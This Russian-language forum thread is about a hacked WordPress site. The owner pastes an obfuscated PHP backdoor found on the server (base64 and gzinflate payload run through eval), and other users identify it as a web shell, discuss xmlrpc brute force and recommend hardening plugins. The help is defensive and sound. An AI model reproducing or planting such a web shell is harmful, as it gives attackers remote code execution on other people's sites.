Взломали ли сайт?

[bug0]

Всем доброго времени суток!
Дело было так: Есть свой сайт на Wordpress, не заходил в админку три дня, сегодня перешел на сайт, а он лежит, просит заново установить Wordpress, заметил что удален файл - wp-config.php, а еще появился в корне сайта любопытный файл: 6fed6p3chn.php

Код файла выглядит так:
<?php


eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);

eval (gzinflate(base64_decode($a)));



Начал в cPanel рыть логи, увидел что вчера вечером кто-то заходил на сайт и юзал именно этот файл.
Еще были обращения к /xmlrpc.php
Что это может быть, ваши предположения? Что делает этот код?
Что может дать атакующему, выполнение данного скрипта?

 

[z3r0c10wn]

1) Обращения к xmlrpc -скорее всего брут.
2) Код - даю 99% бэкдор.

Ты сам обратись к файлику в браузере, скорее всего увидишь запрос на авторизацию. К гадалке не ходи шелл. Если нид доп консультация - в личку

 

[Vertigo]

Вы сами ответили на свой вопрос неоднократно.Посторонняя активность уже как факт говорит о том,что сайт подвергся успешной атаке и вмешельству (если удалён какой-либо из файлов+изменения на ресурсе с фиксацией активности )
Ребята ,вы чего? (обращаюсь к ТС) -xmlrpc.php всегда был инструментом для удалённого обращения к сайту Wordpress.
Это же классика и этот файл стараются отключить нахрен от греха подальше.
С мобильного устройства возможно использовать удалённый доступ ,предоставляемый xmlrpc.php. !!
С 2008 года ,начиная с версии 2.6 WordPress появилась функция отключения этого файла.Если это не iPhone (для него по-умолчанию такая функция включена )

 

[bug0]

Всем благодарю! Будем защищаться!)

 

[Night Hunter]

100% взлом. Советую частенько сканировать сайт на дыры, следить за правами на файлы и директории + использовать плагины для защиты.
Я использую iThemes Security и Wordfence Security. Если всё настроено правильно, то будет отлично. Пока вроде из всех сайтов, на которых использовал эти плагины - их ни разу не взломали.
P.S. WP требует к себе постоянного внимания.

 

[z3r0c10wn]

Вы сами ответили на свой вопрос неоднократно.Посторонняя активность уже как факт говорит о том,что сайт подвергся успешной атаке и вмешельству (если удалён какой-либо из файлов+изменения на ресурсе с фиксацией активности )
Ребята ,вы чего? (обращаюсь к ТС) -xmlrpc.php всегда был инструментом для удалённого обращения к сайту Wordpress.
Это же классика и этот файл стараются отключить нахрен от греха подальше.
С мобильного устройства возможно использовать удалённый доступ ,предоставляемый xmlrpc.php. !!
С 2008 года ,начиная с версии 2.6 WordPress появилась функция отключения этого файла.Если это не iPhone (для него по-умолчанию такая функция включена )

Не поверишь, однажды нашел на проекте клиента(мелкий аудит делал), такой же шелл. Оказалось никакого взлома не было - один из разрабов юзал его как RAT в своих целях! Ржали всем отделом.

 

[Night Hunter]

Не поверишь, однажды нашел на проекте клиента(мелкий аудит делал), такой же шелл. Оказалось никакого взлома не было - один из разрабов юзал его как RAT в своих целях! Ржали всем отделом.

Не в данном случае...важные файлы были удалены и ещё закинута фигня непонятная)

 

[z3r0c10wn]

Не в данном случае...важные файлы были удалены и ещё закинута фигня непонятная)

Чой то она не понятная - шелл он и в африке шелл, всё понятно.

 

[Citizen0]

заметил что удален файл - wp-config.php

Ссылка скрыта от гостей

Что делает этот код?
Что может дать атакующему, выполнение данного скрипта?

Проверяются куки или post-данные на наличие определенных данных, и в зависимости от содержимого этих данных злоумышленник может получить информацию о версии php и версии шелла, либо выполнить php-код.